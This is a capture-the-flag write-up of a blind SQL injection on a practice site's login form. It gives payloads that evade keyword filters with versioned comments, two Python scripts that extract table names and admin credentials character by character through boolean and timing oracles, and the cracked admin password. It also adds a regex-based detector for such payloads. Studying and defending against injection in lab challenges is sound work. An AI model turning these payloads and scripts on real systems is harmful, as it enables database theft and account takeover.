CTF{s1mpl3_1nJ3ction_very_easy!!}
Description:
A very simple injection, everyone give it a try: http://web.jarvisoj.com:32787/
Analysis:
- Entering admin with 123 returns "wrong password". Entering admin' with 123 returns "wrong username". Entering admin'# returns "wrong password", and entering username='|| 1# also returns "wrong password". Nice! The injection point is confirmed!
- Along the way I took a detour into time-based blind injection, which went very slowly (mainly because my computer is weak). Let's first go through the normal solution.
Boolean-based blind SQL injection: during the injection the application only ever returns True ("wrong password") or False ("wrong username").
username='|| ascii(substr(database(),1,1))>1#
→ 密碼錯誤 (wrong password)
username='|| ascii(substr((/*!select*/ database()) ,1,1))>1 #
→ 密碼錯誤 (wrong password)
username='|| ascii(substr((/*!select*/ group_concat(table_name) /*!from*/ information_schema.tables /*!where*/ table_schema=database()),1,1))>1 #
→ 密碼錯誤 (wrong password)
Good, now the script can be run. It turns up a table named admin with columns id, username, password; the password value is 334cfb59c9d74849801d5acdcfdaadc3, and an online MD5 lookup resolves it to eTAloCrEP... that's just unfair!
- The wrong path deserves to be walked to the end as well! With username='|| sleep(5)# I found the server can be made to sleep.
(Also saving username=admin'|sleep(10)|', which executes too, in case or gets filtered next time: more payloads, more roads.)
So it should be a time-based blind injection (it isn't). Start looking for what is filtered:
username='|| if(2>1,sleep(5),0)#
sleeps
username='|| if(ascii('a')>1,sleep(5),0)#
sleeps
username='|| if(ascii(substring(database(),1,1))>1,sleep(5),0)#
sleeps again; how much sleeping can it do?
username='|| if(ascii(substring( (/*!select*/ database() ) ,1,1))>1,sleep(5),0)#
Found that select is filtered; bypass it with /*!select*/
username='|| if(ascii(substring( (/*!select*/ group_concat(table_name) /*!from*/ information_schema.tables /*!where*/ table_schema=database() ) ,1,1))>1,sleep(5),0)#
Then wrap the remaining keywords in /*! ... */ the same way to get past the filter.
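From the defender's side, the keyword filter above failed because it never saw the keyword hidden inside the /*!select*/ versioned comment. The following is an added example, not code from the original writeup: a log-side check that unwraps such comments before matching and then flags the blind-injection traits the payloads above share (quote followed by ||/or, ascii(substr(...)) character probes, sleep(), information_schema, trailing #). The sample request bodies are constructed and the signal names are my own.

```python
import re
import urllib.parse

# Constructed sample login POST bodies, URL-encoded the way a reverse proxy or
# application log would record the form the writeup's script submits.
SAMPLE_REQUESTS = [
    "username=admin&password=123",
    "username=o%27brien&password=hunter2",
    "username=%27%7C%7C+ascii%28substr%28%28%2F%2A%21select%2A%2F+database%28%29%29"
    "%2C1%2C1%29%29%3E1+%23&password=",
    "username=%27%7C%7C+if%28ascii%28%27a%27%29%3E1%2Csleep%285%29%2C0%29%23&password=",
]

VERSIONED_COMMENT = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)  # /*!select*/ or /*!50000select*/

def normalize(value):
    """Undo the trick the filter missed: unwrap versioned comments so that
    /*!select*/ reads as select, then collapse whitespace and lowercase."""
    value = VERSIONED_COMMENT.sub(r" \1 ", value)
    return re.sub(r"\s+", " ", value).strip().lower()

# Heuristic signals shared by the payloads in the writeup; the names are my own.
SIGNALS = {
    "quote_then_or": re.compile(r"'\s*(\|\||\bor\b)"),               # '|| 1#   ' or 1
    "char_oracle": re.compile(r"\bascii\s*\(\s*substr(ing)?\s*\("),  # per-character probe
    "time_delay": re.compile(r"\b(sleep|benchmark)\s*\("),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "trailing_comment": re.compile(r"(#|--\s*)\s*$"),
}

def score_field(raw):
    found = set()
    if VERSIONED_COMMENT.search(raw):  # checked on the raw value, before unwrapping
        found.add("versioned_comment")
    text = normalize(raw)
    for name, pattern in SIGNALS.items():
        if pattern.search(text):
            found.add(name)
    return found

def analyze_login(body):
    """Map each form field that carries at least one signal to its signal set."""
    fields = urllib.parse.parse_qs(body, keep_blank_values=True)
    return {k: s for k, s in ((k, score_field(v[0])) for k, v in fields.items()) if s}

def is_blind_sqli(body):
    """A lone trailing '#' is not evidence; require two other signals in one field."""
    return any(len(hits - {"trailing_comment"}) >= 2 for hits in analyze_login(body).values())
```

Run it over real login logs and the two injected bodies are flagged while both legitimate logins (including the apostrophe in o'brien) pass.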
Next comes the pleasant part, writing code. Both versions are included below; remember to swap data1/data2/data3 into the payload by hand.
def timeSql():  # time-based blind injection
    import requests, time
    s = requests.Session()
    url = 'http://web.jarvisoj.com:32787/login.php'
    database = ''
    for i in range(1, 20):
        for x in range(32, 128):
            data1 = 'ascii(substr((/*!select*/ group_concat(table_name) /*!from*/ information_schema.tables /*!where*/ table_schema=database()),%s,1))<= %s' % (i, x)  # dump table names
            data2 = 'ascii(substr((/*!select*/ group_concat(column_name) /*!from*/ information_schema.columns /*!where*/ table_schema=database()),%s,1))<=%s' % (i, x)  # dump column names
            data3 = 'ascii(substr((/*!select*/ group_concat(id,username,password) /*!from*/ admin),%s,1))<=%s' % (i, x)  # dump values
            payload = {'username': "'|| if(%s,sleep(2),0)# " % (data3), 'password': ''}  # swap data1/data2/data3 by hand
            #print (chr(x),payload)
            t1 = time.time()
            s.post(url, payload)
            if time.time() - t1 > 2:  # the server slept, so the condition held: first x with ascii <= x is the character
                database += chr(x)
                break
        print(i, database)
def boolSql():  # boolean-based blind injection with binary search
    import requests
    s = requests.Session()
    url = 'http://web.jarvisoj.com:32787/login.php'
    database = ''
    for i in range(1, 50):
        toe = 31    # lower bound: the character's ASCII value is at least toe
        head = 128  # upper bound: the character's ASCII value is below head
        while head >= toe:
            mid = (toe + head) // 2
            data1 = 'ascii(substr((/*!select*/ group_concat(table_name) /*!from*/ information_schema.tables /*!where*/ table_schema=database()),%s,1))>=%s' % (i, mid)  # dump table names
            data2 = 'ascii(substr((/*!select*/ group_concat(column_name) /*!from*/ information_schema.columns /*!where*/ table_schema=database()),%s,1))>=%s' % (i, mid)  # dump column names
            data3 = 'ascii(substr((/*!select*/ group_concat(id,username,password) /*!from*/ admin),%s,1))>=%s' % (i, mid)  # dump values
            payload = {'username': "'|| %s #" % (data3), 'password': ''}  # swap data1/data2/data3 by hand while running
            #print (payload)
            result = s.post(url, payload).text.split('<a class="close" data-dismiss="alert">×</a><strong>')[1][:5]
            #print(head,toe,mid,result)
            if '用戶名錯誤' in result:  # "wrong username" = False: ascii < mid (string must match the server's message)
                head = mid
            elif head - toe > 1:      # True: ascii >= mid, raise the lower bound
                toe = mid
            else:                     # interval narrowed to a single value
                break
        database += chr(mid)
        print(i, database)
- Finally, log in with admin and eTAloCrEP to get the flag.
Summary
- Binary search really can rescue a weak computer!
- Unless you have to, don't attempt time-based blind injection, OK? It has to sleep and it can't be bisected! Promise me!